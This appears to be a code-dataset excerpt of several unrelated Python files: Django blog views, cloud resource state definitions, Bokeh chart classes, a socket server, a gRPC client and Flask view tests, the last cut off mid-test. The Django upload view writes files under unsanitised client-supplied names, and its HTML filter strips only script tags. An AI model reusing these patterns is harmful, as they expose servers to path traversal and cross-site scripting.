BeautifulSoup(content, \"html.parser\")\n # 对文章进行过滤:\n for tag in soup.find_all():\n # print(tag.name)\n if tag.name in [\"script\", ]:\n tag.decompose()\n\n # 切片文章文本\n desc = soup.text[0:150]\n\n article_obj = Article.objects.create(title=title, content=str(soup), user=user, category_id=cate_pk, desc=desc)\n\n for tag_pk in tags_pk_list:\n Article2Tag.objects.create(article_id=article_obj.pk, tag_id=tag_pk)\n\n return redirect(\"/backend/\")\n\n\n else:\n\n blog = request.user.blog\n cate_list = Category.objects.filter(blog=blog)\n tags = Tag.objects.filter(blog=blog)\n return render(request, \"backend/add_article.html\", locals())\n\n\nfrom cnblog import settings\nimport os.path\n\n\ndef upload(request):\n # print(request.FILES)\n obj = request.FILES.get(\"upload_img\")\n name = obj.name\n path = os.path.join(settings.BASE_DIR, \"static\", \"upload\", name)\n with open(path, \"wb\") as f:\n for line in obj:\n f.write(line)\n\n import json\n\n res = {\n \"error\": 0,\n \"url\": \"/static/upload/\" + name\n }\n\n return HttpResponse(json.dumps(res))\n\n\ndef delete(request, nid):\n # Article.objects.filter(nid=nid).delete()\n return HttpResponse(str(nid))\n\n\ndef edit_article(request, nid):\n # if request.method=='POST':\n article_obj = Article.objects.filter(nid=nid).first()\n tag_list = Article2Tag.objects.filter(article_id=nid).values_list('tag_id')\n tag_list_id = []\n for i in tag_list:\n tag_list_id.append(i[0])\n print(tag_list_id)\n blog = request.user.blog\n cate_list = Category.objects.filter(blog=blog)\n tags = Tag.objects.filter(blog=blog)\n print('tags', tags)\n cate_id = cate_list.filter(blog=blog, article__pk=nid).values_list('pk').first()[0]\n # print('cate_id', cate_id)\n return render(request, 'backend/edit_article.html/', locals())\n\n\nfrom utils.code import check_code\n\n\ndef code(request):\n img, random_code = check_code()\n request.session['random_code'] = random_code\n from io import BytesIO\n stream = BytesIO()\n img.save(stream, 'png')\n return HttpResponse(stream.getvalue())\n","sub_path":"cnblog/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"144312972","text":"# -*- coding: utf-8 -*-\n# COPYRIGHT (C) 2018-2019 GIG TECHNOLOGY NV\n# ALL RIGHTS RESERVED.\n#\n# ALTHOUGH YOU MAY BE ABLE TO READ THE CONTENT OF THIS FILE, THIS FILE\n# CONTAINS CONFIDENTIAL INFORMATION OF GIG TECHNOLOGY NV. 
YOU ARE NOT ALLOWED\n# TO MODIFY, REPRODUCE, DISCLOSE, PUBLISH OR DISTRIBUTE ITS CONTENT,\n# EMBED IT IN OTHER SOFTWARE, OR CREATE DERIVATIVE WORKS, UNLESS PRIOR\n# WRITTEN PERMISSION IS OBTAINED FROM GIG TECHNOLOGY NV.\n#\n# THE COPYRIGHT NOTICE ABOVE DOES NOT EVIDENCE ANY ACTUAL OR INTENDED\n# PUBLICATION OF SUCH SOURCE CODE.\n#\n# @@license_version:1.8@@\n\n\nclass Machine(object):\n \"\"\"\n Define possible machine model status\n \"\"\"\n\n VIRTUAL = \"VIRTUAL\"\n HALTED = \"HALTED\"\n RUNNING = \"RUNNING\"\n PAUSED = \"PAUSED\"\n DELETED = \"DELETED\"\n DESTROYED = \"DESTROYED\"\n ERROR = \"ERROR\"\n\n DEPLOYING = \"DEPLOYING\"\n STOPPING = \"STOPPING\"\n RESTORING = \"RESTORING\"\n STARTING = \"STARTING\"\n PAUSING = \"PAUSING\"\n RESUMING = \"RESUMING\"\n REBOOTING = \"REBOOTING\"\n RESETTING = \"RESETTING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n ADDING_DISK = \"ADDING_DISK\"\n ATTACHING_DISK = \"ATTACHING_DISK\"\n DETACHING_DISK = \"DETACHING_DISK\"\n DELETING_DISK = \"DELETING_DISK\"\n CHANGING_DISK_LIMITS = \"CHANGING_DISK_LIMITS\"\n CLONING = \"CLONING\"\n RESIZING = \"RESIZING\"\n CREATING_TEMPLATE = \"CREATING_TEMPLATE\"\n\n INVALID_STATES = [DESTROYED, DELETED, ERROR, DESTROYING]\n NON_CONSUMING_STATES = [DESTROYED, DELETED, ERROR, HALTED]\n VALID_STATES = [PAUSED, HALTED, RUNNING]\n UP_STATES = [RUNNING, PAUSED]\n STATIC_STATES = [VIRTUAL, HALTED, RUNNING, PAUSED, DELETED, DESTROYED]\n TRANSITION_STATES = [\n DEPLOYING,\n STOPPING,\n STARTING,\n REBOOTING,\n RESETTING,\n PAUSING,\n RESUMING,\n DELETING,\n RESTORING,\n DESTROYING,\n ADDING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n CLONING,\n RESIZING,\n CREATING_TEMPLATE,\n CHANGING_DISK_LIMITS,\n DELETING_DISK,\n ]\n\n ALLOWED_TRANSITIONS = {\n VIRTUAL: [DEPLOYING, DESTROYING],\n RUNNING: [\n PAUSING,\n STOPPING,\n DELETING,\n RESETTING,\n REBOOTING,\n ADDING_DISK,\n DELETING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n RESIZING,\n CHANGING_DISK_LIMITS,\n ],\n PAUSED: [\n RESUMING,\n STOPPING,\n DELETING,\n RESETTING,\n REBOOTING,\n ADDING_DISK,\n DELETING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n RESIZING,\n CHANGING_DISK_LIMITS,\n ],\n HALTED: [\n STARTING,\n DELETING,\n DESTROYING,\n ADDING_DISK,\n ATTACHING_DISK,\n DETACHING_DISK,\n DESTROYING,\n CLONING,\n RESIZING,\n REBOOTING,\n RESETTING,\n DELETING_DISK,\n CREATING_TEMPLATE,\n CHANGING_DISK_LIMITS,\n ],\n DELETED: [RESTORING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Cloudspace(object):\n # static states\n VIRTUAL = \"VIRTUAL\"\n DEPLOYED = \"DEPLOYED\"\n DESTROYED = \"DESTROYED\"\n DELETED = \"DELETED\"\n PAUSED = \"PAUSED\"\n ERROR = \"ERROR\"\n DISABLED = \"DISABLED\"\n\n # transition states\n DEPLOYING = \"DEPLOYING\"\n DISABLING = \"DISABLING\"\n ENABLING = \"ENABLING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n RESTORING = \"RESTORING\"\n PAUSING = \"PAUSING\"\n RESUMING = \"RESUMING\"\n RESETTING = \"RESETTING\"\n UPDATING = \"UPDATING\"\n\n TRANSITION_STATES = [\n DEPLOYING,\n DISABLING,\n ENABLING,\n DELETING,\n DESTROYING,\n RESTORING,\n PAUSING,\n RESUMING,\n RESETTING,\n UPDATING,\n ]\n STATIC_STATES = [VIRTUAL, DEPLOYED, DESTROYED, DELETED, DISABLED, PAUSED]\n VALID_STATES = [DEPLOYED, PAUSED]\n INVALID_STATES = [DESTROYED, DESTROYING, DELETED, DISABLED]\n ALLOWED_TRANSITIONS = {\n VIRTUAL: [DEPLOYING, DELETING, DESTROYING],\n DEPLOYED: [\n DISABLING,\n DELETING,\n DESTROYING,\n PAUSING,\n RESETTING,\n RESUMING,\n UPDATING,\n ],\n PAUSED: [\n RESUMING,\n RESETTING,\n ENABLING,\n 
DISABLING,\n DELETING,\n DESTROYING,\n UPDATING,\n ],\n DELETED: [DESTROYING, RESTORING],\n DISABLED: [ENABLING, DELETING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Account(object):\n DESTROYED = \"DESTROYED\"\n CONFIRMED = \"CONFIRMED\"\n DISABLED = \"DISABLED\"\n DELETED = \"DELETED\"\n\n DESTROYING = \"DESTROYING\"\n DISABLING = \"DISABLING\"\n ENABLING = \"ENABLING\"\n DELETING = \"DELETING\"\n RESTORING = \"RESTORING\"\n DESTROYING = \"DESTROYING\"\n\n INVALID_STATES = [DESTROYED, DESTROYING, DELETED]\n TRANSITION_STATES = [RESTORING, DELETING, DESTROYING, DISABLING, ENABLING]\n STATIC_STATES = [CONFIRMED, DELETED, DISABLED, DESTROYED]\n ALLOWED_TRANSITIONS = {\n CONFIRMED: [DISABLING, DELETING, DESTROYING],\n DISABLED: [ENABLING, DELETING, DESTROYING],\n DELETED: [RESTORING, DESTROYING],\n DESTROYED: [],\n }\n\n\nclass Disk(object):\n MODELED = \"MODELED\"\n ASSIGNED = \"ASSIGNED\"\n CREATING = \"CREATING\"\n CREATED = \"CREATED\"\n DESTROYED = \"DESTROYED\"\n\n # attached disk in recycle bin deleted together with VM\n DELETED = \"DELETED\"\n # detached disk in recycle bin\n TOBEDELETED = \"TOBEDELETED\"\n\n CREATING = \"CREATING\"\n ASSIGNING = \"ASSIGNING\"\n DELETING_ATTACHED_DISK = \"DELETING_ATTACHED_DISK\"\n DESTROYING = \"DESTROYING\"\n DELETING_DETACHED_DISK = \"DELETING_DETACHED_DISK\"\n DESTROYING = \"DESTROYING\"\n RESTORING_ATTACHED_DISK = \"RESTORING_ATTACHED_DISK\"\n RESTORING_DETACHED_DISK = \"RESTORING_DETACHED_DISK\"\n\n DETACHING = \"DETACHING\"\n ATTACHING = \"ATTACHING\"\n RESIZING = \"RESIZING\"\n # the disk goes into this state when we call delete with permanently flag\n TOBEDESTROYED = \"TOBEDESTROYED\"\n VALID_STATES = [ASSIGNED, CREATED]\n INVALID_STATES = [TOBEDESTROYED, DESTROYED, TOBEDELETED, DELETED]\n DESTROYED_STATES = [DESTROYED, TOBEDESTROYED]\n TRANSITION_STATES = [\n CREATING,\n RESIZING,\n ATTACHING,\n DETACHING,\n DELETING_DETACHED_DISK,\n DESTROYING,\n DELETING_ATTACHED_DISK,\n RESTORING_DETACHED_DISK,\n RESTORING_ATTACHED_DISK,\n ]\n STATIC_STATES = [\n MODELED,\n CREATED,\n ASSIGNED,\n TOBEDELETED,\n TOBEDESTROYED,\n DELETED,\n DESTROYED,\n ]\n\n ALLOWED_TRANSITIONS = {\n MODELED: [CREATING, ASSIGNING],\n CREATED: [\n DELETING_DETACHED_DISK,\n DESTROYING,\n ATTACHING,\n RESIZING,\n TOBEDELETED,\n TOBEDESTROYED,\n ],\n ASSIGNED: [DELETING_ATTACHED_DISK, DESTROYING, DETACHING, RESIZING],\n DELETED: [DESTROYING, RESTORING_ATTACHED_DISK],\n TOBEDELETED: [DESTROYING, RESTORING_DETACHED_DISK, TOBEDESTROYED],\n DESTROYED: [],\n DETACHING: [CREATED],\n CREATING: [CREATED],\n ASSIGNING: [ASSIGNED],\n DELETING_DETACHED_DISK: [TOBEDELETED],\n DELETING_ATTACHED_DISK: [DELETED],\n DESTROYING: [DESTROYED],\n RESTORING_ATTACHED_DISK: [ASSIGNED],\n RESTORING_DETACHED_DISK: [CREATED],\n }\n\n\nclass Image(object):\n MODELED = \"MODELED\"\n CREATED = \"CREATED\"\n DELETED = \"DELETED\"\n DESTROYED = \"DESTROYED\"\n TOBEDESTROYED = \"TOBEDESTROYED\"\n DISABLED = \"DISABLED\"\n ERROR = \"ERROR\"\n\n CREATING = \"CREATING\"\n DELETING = \"DELETING\"\n DESTROYING = \"DESTROYING\"\n\n INVALID_STATES = [DESTROYED, DELETED]\n TRANSITION_STATES = [CREATING, DELETING, DESTROYING]\n STATIC_STATES = [MODELED, CREATED, DELETED, DISABLED, DESTROYED, TOBEDESTROYED]\n ALLOWED_TRANSITIONS = {\n MODELED: [CREATING, DESTROYING],\n CREATED: [DELETED, DISABLED, TOBEDESTROYED],\n DISABLED: [CREATED, DELETING, DESTROYING],\n DELETED: [CREATED, TOBEDESTROYED],\n DESTROYED: [],\n }\n\n\nclass Node(object):\n ENABLED = \"ENABLED\"\n MAINTENANCE = \"MAINTENANCE\"\n DECOMMISSIONED = 
\"DECOMMISSIONED\"\n ERROR = \"ERROR\"\n\n DEACTIVATING = \"DEACTIVATING\"\n ENABLING = \"ENABLING\"\n DECOMMISSIONING = \"DECOMMISSIONING\"\n UPDATING = \"UPDATING\"\n\n TRANSITION_STATES = [DEACTIVATING, ENABLING, DECOMMISSIONING, UPDATING]\n ALLOWED_TRANSITIONS = {\n ENABLED: [DEACTIVATING, DECOMMISSIONING, UPDATING],\n MAINTENANCE: [ENABLING, DECOMMISSIONING],\n DECOMMISSIONED: [],\n ERROR: [ENABLING, DEACTIVATING],\n }\n\n\nclass Stack(Node):\n pass\n","sub_path":"debug-ovc-transition-states/resourcestatus.py","file_name":"resourcestatus.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"88996589","text":"\"\"\"This is the Bokeh charts interface. It gives you a high level API to build\ncomplex plot is a simple way.\n\nThis is the main Chart class which is able to build several plots using the low\nlevel Bokeh API. It setups all the plot characteristics and lets you plot\ndifferent chart types, taking OrderedDict as the main input. It also supports\nthe generation of several outputs (file, server, notebook).\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENCE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport itertools\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom ..glyphs import (Asterisk, Circle, CircleCross, CircleX, Cross, Diamond,\n DiamondCross, InvertedTriangle, Line, Rect, Segment,\n Square, SquareCross, SquareX, Triangle, Xmarker, Quad)\nfrom ..objects import (CategoricalAxis, DatetimeAxis, Grid, Legend,\n LinearAxis, PanTool, Plot, PreviewSaveTool, ResetTool,\n WheelZoomTool)\n\nfrom ..document import Document\nfrom ..session import Session\nfrom ..embed import file_html\nfrom ..resources import INLINE\nfrom ..browserlib import view\nfrom ..utils import publish_display_data\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\n\nclass Chart(object):\n \"\"\"This is the main Chart class, the core of the ``Bokeh.charts`` interface.\n\n This class essentially set up a \"universal\" Plot object containing all the\n needed attributes and methods to draw any of the Charts that you can build\n subclassing the ChartObject class.\n \"\"\"\n def __init__(self, title, xlabel, ylabel, legend, xscale, yscale, width, height,\n tools, filename, server, notebook):\n \"\"\"Common arguments to be used by all the inherited classes.\n\n Args:\n title (str): the title of your plot.\n xlabel (str): the x-axis label of your plot.\n ylabel (str): the y-axis label of your plot.\n legend (str): the legend of your plot. The legend content is\n inferred from incoming input.It can be ``top_left``,\n ``top_right``, ``bottom_left``, ``bottom_right``.\n It is ``top_right`` is you set it as True.\n xscale (str): the x-axis type scale of your plot. It can be\n ``linear``, ``datetime`` or ``categorical``.\n yscale (str): the y-axis type scale of your plot. 
It can be\n                ``linear``, ``datetime`` or ``categorical``.\n            width (int): the width of your plot in pixels.\n            height (int): the height of your plot in pixels.\n            tools (bool): to enable or disable the tools in your plot.\n            filename (str or bool): the name of the file where your plot\n                will be written. If you pass True to this argument, it will use\n                ``untitled`` as a filename.\n            server (str or bool): the name of your plot in the server.\n                If you pass True to this argument, it will use ``untitled``\n                as the name in the server.\n            notebook (bool): if you want to output (or not) your plot into the\n                IPython notebook.\n\n        Attributes:\n            plot (obj): main Plot object.\n            categorical (bool): tag to prevent adding a wheelzoom to a\n                categorical plot.\n            glyphs (list): to keep track of the glyphs added to the plot.\n        \"\"\"\n        self.title = title\n        self.xlabel = xlabel\n        self.ylabel = ylabel\n        self.legend = legend\n        self.xscale = xscale\n        self.yscale = yscale\n        self.plot_width = width\n        self.plot_height = height\n        self.tools = tools\n        self.filename = filename\n        self.server = server\n        self.notebook = notebook\n        self._xdr = None\n        self._ydr = None\n        self.plot = Plot(title=self.title,\n                         x_range=self._xdr,\n                         y_range=self._ydr,\n                         plot_width=self.plot_width,\n                         plot_height=self.plot_height)\n        self.categorical = False\n        self.glyphs = []\n\n    def start_plot(self, xgrid, ygrid):\n        \"\"\"Add the axis, grids and tools to self.plot\n\n        Args:\n            xgrid(bool): whether to show the xgrid\n            ygrid(bool): whether to show the ygrid\n        \"\"\"\n        # Add axis\n        xaxis = self.make_axis(\"below\", self.xscale, self.xlabel)\n        yaxis = self.make_axis(\"left\", self.yscale, self.ylabel)\n\n        # Add grids\n        if xgrid:\n            self.make_grid(0, xaxis.ticker)\n        if ygrid:\n            self.make_grid(1, yaxis.ticker)\n\n        # Add tools\n        if self.tools:\n            if not self.categorical:\n                pan = PanTool()\n                wheelzoom = WheelZoomTool()\n                reset = ResetTool()\n                self.plot.add_tools(pan, wheelzoom, reset)\n            previewsave = PreviewSaveTool()\n            self.plot.add_tools(previewsave)\n\n    def add_data_plot(self, x_range, y_range):\n        \"\"\"Add range data to the initialized empty attributes.\n\n        Args:\n            x_range (obj): x-associated datarange object for your `self.plot`.\n            y_range (obj): y-associated datarange object for your `self.plot`.\n        \"\"\"\n        # Overwrite the ranges in the plot\n        self.plot.x_range = x_range\n        self.plot.y_range = y_range\n\n    def end_plot(self, groups):\n        \"\"\"Add the legend to your plot, and the plot to a new Document.\n\n        It also adds the Document to a new Session in the case of server output.\n\n        Args:\n            groups(list): keeping track of the incoming groups of data.\n                Useful to automatically setup the legend.\n        \"\"\"\n        # Add legend\n        if self.legend:\n            listed_glyphs = [[glyph] for glyph in self.glyphs]\n            legends = OrderedDict(zip(groups, listed_glyphs))\n            if self.legend is True:\n                orientation = \"top_right\"\n            else:\n                orientation = self.legend\n            legend = Legend(orientation=orientation, legends=legends)\n            self.plot.add_layout(legend)\n\n        # Add to document and session if server output is requested\n        self.doc = Document()\n        self.doc.add(self.plot)\n        if self.server:\n            if self.server is True:\n                self.servername = \"untitled\"\n            else:\n                self.servername = self.server\n            self.session = Session()\n            self.session.use_doc(self.servername)\n            self.session.load_document(self.doc)\n            self.session.store_document(self.doc)\n\n    def make_axis(self, location, scale, label):\n        \"\"\"Create linear, date or categorical axis depending on the location,\n        scale and with the proper labels.\n\n        Args:\n            
location(str): where the axis is placed. It can be\n                ``left``, ``right``, ``above`` or ``below``.\n            scale (str): the scale on the axis. It can be ``linear``, ``datetime``\n                or ``categorical``.\n            label (str): the label on the axis.\n\n        Return:\n            axis: Axis instance\n        \"\"\"\n        if scale == \"linear\":\n            axis = LinearAxis(axis_label=label)\n        elif scale == \"datetime\":\n            axis = DatetimeAxis(axis_label=label)\n        elif scale == \"categorical\":\n            axis = CategoricalAxis(major_label_orientation=np.pi / 4,\n                                   axis_label=label)\n            self.categorical = True\n\n        self.plot.add_layout(axis, location)\n\n        return axis\n\n    def make_grid(self, dimension, ticker):\n        \"\"\"Create the grid, just passing the dimension and ticker.\n\n        Args:\n            dimension(int): the dimension of the axis, ie. xaxis=0, yaxis=1.\n            ticker (obj): the axis.ticker object\n\n        Return:\n            grid: Grid instance\n        \"\"\"\n        grid = Grid(dimension=dimension, ticker=ticker)\n        self.plot.add_layout(grid)\n\n        return grid\n\n    def make_segment(self, source, x0, y0, x1, y1, color, width):\n        \"\"\" Create a segment glyph and append it to the plot.renderers list.\n\n        Args:\n            source (obj): datasource object containing segment references.\n            x0 (str or list[float]) : values or field names of starting ``x`` coordinates\n            y0 (str or list[float]) : values or field names of starting ``y`` coordinates\n            x1 (str or list[float]) : values or field names of ending ``x`` coordinates\n            y1 (str or list[float]) : values or field names of ending ``y`` coordinates\n            color (str): the segment color\n            width (int): the segment width\n\n        Return:\n            segment: Segment instance\n        \"\"\"\n        segment = Segment(x0=x0, y0=y0, x1=x1, y1=y1, line_color=color, line_width=width)\n\n        self._append_glyph(source, segment)\n\n        return segment\n\n    def make_line(self, source, x, y, color):\n        \"\"\"Create a line glyph and append it to the plot.renderers list.\n\n        Args:\n            source (obj): datasource object containing line references.\n            x (str or list[float]) : values or field names of line ``x`` coordinates\n            y (str or list[float]) : values or field names of line ``y`` coordinates\n            color (str): the line color\n\n        Return:\n            line: Line instance\n        \"\"\"\n        line = Line(x=x, y=y, line_color=color)\n\n        self._append_glyph(source, line)\n\n        return line\n\n    def make_quad(self, source, top, bottom, left, right, color, line_color):\n        \"\"\"Create a quad glyph and append it to the plot.renderers list.\n\n        Args:\n            source (obj): datasource object containing quad references.\n            left (str or list[float]) : values or field names of left edges\n            right (str or list[float]) : values or field names of right edges\n            top (str or list[float]) : values or field names of top edges\n            bottom (str or list[float]) : values or field names of bottom edges\n            color (str): the fill color\n            line_color (str): the line color\n\n        Return:\n            quad: Quad instance\n        \"\"\"\n        quad = Quad(top=top, bottom=bottom, left=left, right=right,\n                    fill_color=color, fill_alpha=0.7, line_color=line_color, line_alpha=1.0)\n\n        self._append_glyph(source, quad)\n\n        return quad\n\n    def make_rect(self, source, x, y, width, height, color, line_color, line_width):\n        \"\"\"Create a rect glyph and append it to the renderers list.\n\n        Args:\n            source (obj): datasource object containing rect references.\n            x (str or list[float]) : values or field names of center ``x`` coordinates\n            y (str or list[float]) : values or field names of center ``y`` coordinates\n            width (str or list[float]) : values or field names of widths\n            height (str or list[float]) : values or field names of 
heights\n            color (str): the fill color\n            line_color (str): the line color\n            line_width (int): the line width\n\n        Return:\n            rect: Rect instance\n        \"\"\"\n        rect = Rect(x=x, y=y, width=width, height=height, fill_color=color,\n                    fill_alpha=0.7, line_color=line_color, line_alpha=1.0, line_width=line_width)\n\n        self._append_glyph(source, rect)\n\n        return rect\n\n    def make_scatter(self, source, x, y, markertype, color):\n        \"\"\"Create a marker glyph and append it to the renderers list.\n\n        Args:\n            source (obj): datasource object containing marker references.\n            x (str or list[float]) : values or field names of line ``x`` coordinates\n            y (str or list[float]) : values or field names of line ``y`` coordinates\n            markertype (int or str): Marker type to use (e.g., 2, 'circle', etc.)\n            color (str): color of the points\n\n        Return:\n            scatter: Marker Glyph instance\n        \"\"\"\n\n        _marker_types = OrderedDict([\n            (\"circle\", Circle),\n            (\"square\", Square),\n            (\"triangle\", Triangle),\n            (\"diamond\", Diamond),\n            (\"inverted_triangle\", InvertedTriangle),\n            (\"asterisk\", Asterisk),\n            (\"cross\", Cross),\n            (\"x\", Xmarker),\n            (\"circle_cross\", CircleCross),\n            (\"circle_x\", CircleX),\n            (\"square_x\", SquareX),\n            (\"square_cross\", SquareCross),\n            (\"diamond_cross\", DiamondCross),\n        ])\n\n        g = itertools.cycle(_marker_types.keys())\n        if isinstance(markertype, int):\n            for i in range(markertype):\n                shape = next(g)\n        else:\n            shape = markertype\n        scatter = _marker_types[shape](x=x, y=y, size=10,\n                                       fill_color=color,\n                                       fill_alpha=0.2,\n                                       line_color=color,\n                                       line_alpha=1.0)\n\n        self._append_glyph(source, scatter)\n\n        return scatter\n\n    def show(self):\n        \"\"\"Main show function.\n\n        It shows the plot in file, server and notebook outputs.\n        \"\"\"\n        if self.filename:\n            if self.filename is True:\n                filename = \"untitled\"\n            else:\n                filename = self.filename\n            with open(filename, \"w\") as f:\n                f.write(file_html(self.doc, INLINE, self.title))\n            print(\"Wrote %s\" % filename)\n            view(filename)\n        elif self.filename is False and self.server is False and self.notebook is False:\n            print(\"You have to provide a filename (filename='foo.html' or\"\n                  \" .filename('foo.html')) to save your plot.\")\n\n        if self.server:\n            self.session.use_doc(self.servername)\n            self.session.load_document(self.doc)\n            self.session.show(self.plot)\n\n        if self.notebook:\n            from bokeh.embed import notebook_div\n            publish_display_data({'text/html': notebook_div(self.plot)})\n\n    ## Some helper methods\n    def _append_glyph(self, source, glyph):\n        \"\"\" Append the glyph to the plot.renderer.\n\n        Also add the glyph to the glyphs list.\n\n        Args:\n            source (obj): datasource containing data for the glyph\n            glyph (obj): glyph type\n        \"\"\"\n        _glyph = self.plot.add_glyph(source, glyph)\n\n        self.glyphs.append(_glyph)\n","sub_path":"oldsite/python_viz/bokeh/bokeh/charts/_charts.py","file_name":"_charts.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539262485","text":"# !/home/imyin/python_env/newspaper_python3/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on 1/11/18 4:50 PM\n\n@author: imyin\n\n@File: word_process\n\"\"\"\n\nimport jieba\nimport re\n\nif __name__ == '__main__':\n    stop_words = [line.strip() for line in\n                  open('/home/imyin/myProject/gitWorkSpace/BlackCoffee/Analysis/stop_words_ch', encoding='utf-8',\n                       mode='r')]\n    words_count = []\n    with open('/home/imyin/GuangDa/data/news/word_counts', mode='w') as f:\n        for content in 
open('/home/imyin/GuangDa/data/news/hangnei.txt', mode='r'):\n            cut_text = jieba.cut(content)\n            for reg in cut_text:\n                if reg not in stop_words and reg != '\\n' and reg != '':\n                    # words_count.append(reg)\n                    f.write(reg + '\\n')\n","sub_path":"GD/word_process.py","file_name":"word_process.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484980819","text":"import socket\n\ns = socket.socket()\nprint('Successfully created a socket')\n\nport = 12345\n\ns.bind(('', port))\n\ns.listen(5)\n\nwhile True:\n    c, addr = s.accept()\n    print('Accepted a connection from {}'.format(addr))\n    c.send('Thank you for the connection'.encode())\n    c.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8062397","text":"import spacy\n\n# Load the \"en_core_web_sm\" model\nnlp = ____\n\ntext = \"It’s official: Apple is the first U.S. public company to reach a $1 trillion market value\"\n\n# Process the text\ndoc = ____\n\n# Print the doc's text\nprint(____.____)\n","sub_path":"exercises/ja/exc_01_07.py","file_name":"exc_01_07.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314703481","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: client.py\n@time: 2020/12/20 8:13 PM\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: \n\"\"\"\n\nimport grpc\nimport queue\nfrom week05.test.grpc import schema_pb2\nfrom week05.test.grpc import schema_pb2_grpc\n\nq = queue.Queue()\n\n\ndef generate_message():\n    while True:\n        num = q.get()\n        print(num)\n        yield schema_pb2.Request(num=num)\n\n\ndef main():\n    # Open the gRPC channel\n    with grpc.insecure_channel(\"localhost:50051\") as channel:\n        stub = schema_pb2_grpc.GatewayStub(channel)\n        q.put(1)\n        # Stream messages to the server in a loop and receive the replies\n        resp = stub.Call(generate_message())\n        for r in resp:\n            num = r.num\n            q.put(num)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"week05/test/grpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"127694759","text":"\"\"\"Message View tests.\"\"\"\n\n# run these tests like:\n#\n#    FLASK_ENV=production python -m unittest test_message_views.py\n\n\nimport os\nfrom unittest import TestCase\n\nfrom models import db, connect_db, Message, User\n\n# BEFORE we import our app, let's set an environmental variable\n# to use a different database for tests (we need to do this\n# before we import our app, since that will have already\n# connected to the database)\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\n\n# Now we can import app\n\nfrom app import app, CURR_USER_KEY\n\n# Create our tables (we do this here, so we only create the tables\n# once for all tests --- in each test, we'll delete the data\n# and create fresh new clean test data)\n\ndb.create_all()\n\n# Don't have WTForms use CSRF at all, since it's a pain to test\n\napp.config['WTF_CSRF_ENABLED'] = False\n\n\nclass MessageViewTestCase(TestCase):\n    \"\"\"Test views for messages.\"\"\"\n\n    def setUp(self):\n        \"\"\"Create test client, add sample data.\"\"\"\n\n        User.query.delete()\n        Message.query.delete()\n\n        self.client = app.test_client()\n\n        self.testuser = User.signup(username=\"testuser\",\n                                    email=\"test@test.com\",\n                                    password=\"testuser\",\n                                    image_url=None)\n\n        
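# Commit so the freshly signed-up test user is persisted before each test runs\n        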
db.session.commit()\n\n    def test_add_message(self):\n        \"\"\"Can a user add a message?\"\"\"\n\n        # Since we need to change the session to mimic logging in,\n        # we need to use the changing-session trick:\n\n        with self.client as c:\n            with c.session_transaction() as sess:\n                sess[CURR_USER_KEY] = self.testuser.id\n\n            # Now, that session setting is saved, so we can have\n            # the rest of our tests\n\n            resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"})\n\n            # Make sure it redirects\n            self.assertEqual(resp.status_code, 302)\n\n            msg = Message.query.one()\n            self.assertEqual(msg.text, \"Hello\")\n\n    def test_message_view(self):\n        \"\"\"Can we go to the message template to add a message?\"\"\"\n\n        with self.client as c:\n            with c.session_transaction() as sess:\n                sess[CURR_USER_KEY] = self.testuser.id\n\n            resp = c.get(\"/messages/new\")\n            html = resp.get_data(as_text=True)\n\n            self.assertEqual(resp.status_code, 200)\n            self.assertIn(\"Add my message!\", html)\n\n    def test_message_no_user(self):\n        \"\"\"Reroute to home page with no user\"\"\"\n\n        with self.client as c:\n            resp = c.get(\"/messages/new\", follow_redirects=True)\n            html = resp.get_data(as_text=True)\n\n            self.assertEqual(resp.status_code, 200)\n            self.assertIn(\"Access unauthorized.\", html)\n\n    def test_message_invalid_user(self):\n        \"\"\"Reroute to home page with an invalid user\"\"\"\n\n        with self.client as c:\n            with c.session_transaction() as sess:\n                sess[CURR_USER_KEY] = 987654\n\n            resp = c.get(\"/messages/new\", follow_redirects=True)\n            html = resp.get_data(as_text=True)\n\n            self.assertEqual(resp.status_code, 200)\n            self.assertIn(\"Access unauthorized.\", html)\n\n    def test_message_show(self):\n        \"\"\"Can you display the message?\"\"\"\n\n        with self.client as c:\n            
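# Write the session key directly to mimic a logged-in user (same trick as above)\n            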
